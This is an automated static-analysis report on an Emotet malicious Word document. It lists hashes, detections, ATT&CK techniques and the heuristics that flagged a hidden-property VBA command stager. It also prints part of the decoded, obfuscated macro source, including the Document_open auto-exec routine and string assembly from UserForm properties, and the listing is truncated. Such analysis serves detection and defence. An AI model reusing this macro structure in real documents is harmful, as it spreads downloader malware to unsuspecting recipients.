Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 9390910f92f9ab4b…

MALICIOUS

Office (OLE)

101.3 KB Created: 2019-12-19 11:15:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: da497160be53a5bda7967d363dfaebae SHA-1: 1823a8fdb71735ea2c40df23a7757c752cec8d35 SHA-256: 9390910f92f9ab4b0e2864ef5aa1346d98c884535164b6dbad0d711054e7cc04
302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7464357-0', strongly indicating the Emotet family. Critical heuristics indicate the presence of a VBA UserForm hidden-property command stager that executes automatically via the Document_Open macro, using CreateObject and GetObject calls to likely download and run a secondary payload. The embedded VBA macro 'macros.bas' is the source of this malicious behavior.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7464357-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7464357-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13306 bytes
SHA-256: 2fd6c1d13d86485279b9625ca65b0d8796c33dc2c319c4c2f1adfc3fe19d0ecf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Eeglwfvuypu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Srabtjse, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Jteniafb = "Peggy"
Dim Xrfxwfqtvcm As Double
Dim Wqjgyebmukwbv As Double
Emdaknscfk = ("Marilyn")
Dim Qtsbnruiwz As Double
Dim Wybdgiwbm As Boolean
Dim Iylgldodwst As String
Bjijajpftxel = Wwoeymdkcbk
Dim Ivxocnibw As String
Bdokobhuap = ("Sequi quia itaque ipsam molestiae ipsa quos debitis perferendis.")
Dim Hnvzprhgy As Boolean
Dim Gjwibycnz As Boolean
Dim Dvxtvbup As Double
Qopagotjpsn = "Rerum tempora."
Dim Iassgwxbsjfka As String
Dim Wfmjjppughuk As Boolean
Dim Kepuwosd As Double
Tkoyfkqflyn = ("Rerum ipsum sed mollitia voluptatem aliquam et sunt.")
Dim Ezisglkll As Integer
Heqpencswypzb = 152
Wrpykpaykvn = Rycivpraua
Vunhozhbrptvm = 340
Mqdsecahoyom
   Ygpzjssp = "Orville"
Dim Jdssgggbljuww As Double
Dim Rnizqgtdmu As Integer
Aaddjoqdimwn = ("Delbert")
Dim Ahbgckuos As Integer
Dim Qnrpzfyzmf As Double
Dim Flhfrbfru As Integer
Glcgsxylhy = Bynjgyouzyaw
Dim Ednmnoyckexz As Boolean
Nutjmsfh = ("Delectus magnam et quos est provident.")
Dim Ztgxlilgkxtv As Boolean
Dim Keuznilgsmge As Integer
Dim Jcowyunuiaq As Integer
Rpiisvzzhygt = "Consequuntur error possimus voluptas placeat."
Dim Sauqheuwi As Double
Dim Xdhpwtjlourjd As Integer
Dim Frbeidcnuu As Boolean
Jyzvgzmurs = ("Debitis at.")
Dim Ewihmbqrby As Boolean
Udasvqmv = 823
Ampzkkquqn = Zlvubtdwikz
Dytzbfoc = 859
End Sub

Attribute VB_Name = "Ocqunouq"
Attribute VB_Base = "0{E0F51CF9-E923-4BF1-A02D-9AFD67A4F88D}{80D98A36-08FF-41AE-9287-7B1F2DD63418}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Whsthngo"
Function Ooomipyk()
   Vzxszlcqk = "Aliquam sunt et nostrum."
Dim Rbtpwxzoo As Double
Dim Oqkpwuycnlt As Boolean
Nzizkrscq = ("Aut.")
Dim Byandtbb As Double
Dim Lhikohrhh As Integer
Dim Incwpzdxrnxtj As Integer
Tkzukrxzbszpv = Uibdtkyq
Dim Xefsnnywqohh As Double
Fknaepkhnq = ("Reprehenderit enim.")
Dim Rguoutlamns As Double
Dim Fbsfutmvrxi As String
Dim Mxiprozywsbcu As Boolean
Mxssgmzorcsxg = "Quos esse quisquam quo."
Dim Jmrwhnrwvdipi As String
Dim Dagqjteppmnj As Integer
Dim Yrsfwjokyfi As Integer
Wpywqfay = ("Delectus tenetur sunt.")
Dim Pjgexbjteaj As Integer
Pjmzctcaio = 402
Arpxdroga = Qeriomdurzcjn
Xfpqhvnxw = 791
Fqnczrgmr = Eeglwfvuypu.Srabtjse
   Kohnpgtz = "Dolor quod consequuntur perferendis reprehenderit qui ab."
Dim Vvbnauikohl As String
Dim Vihfarfrsrps As Integer
Zjvwobyur = ("Dolor cupiditate et et.")
Dim Boxnsdrutm As String
Dim Ashlzcemu As String
Dim Jbskwowarow As Double
Ieanxyuv = Vdhpzrmg
Dim Bnmztufxlot As Integer
Educrowtrpzx = ("Dana")
Dim Zxjeihlburb As Integer
Dim Swkfiqkc As Boolean
Dim Pvsrukxm As Double
Egzcjlxhdid = "Voluptatem ratione voluptatem."
Dim Kewgkrgvnmsti As String
Dim Qqxezgymwiv As Integer
Dim Dydboyhnydnv As Boolean
Qthibvirnlyb = ("Perferendis saepe.")
Dim Szyounspir As Double
Ibrmjjdphs = 164
Ublmlscmiuuzf = Iybkpdqm
Aboyaezjyusbg = 627
Qlbsdnpiqxfiy = Fqnczrgmr + Ocqunouq.Jtsmkdqpig + Ocqunouq.Tqmdsjidz + Ocqunouq.Hpkiuhnpwqlk
   Ejzduzgvbn = "Vitae quia non."
Dim Jdnlqdiqdnqm As String
Dim Rsvgiwuuxfyft As Double
Sosdwqgym = ("Corporis eligendi sed.")
Dim Yoirtmavhoaue As Boolean
Dim Pfhnlkgllyyjf As Integer
Dim Tifiyglgml As Double
Tqrtnwxbaqypo = Xsudumwu
Dim Whtdzvbhmmv As Integer
Knihkcjp = ("At earum saepe.")
Dim Donrijlxv As Boolean
Dim Rodyavxic As Double
Dim Dokpmfmri As Boolean
Apometxb = "Rerum tempore accusantium."
Dim Uztyfjjhmhrcx As Integer
Dim Hsxfkerfponjo As Double
Dim Kaohjoqr As Boolean
Cjvrkxsdnwaav = ("Loretta")
Dim Cudkravqiwrn As Stri
... (truncated)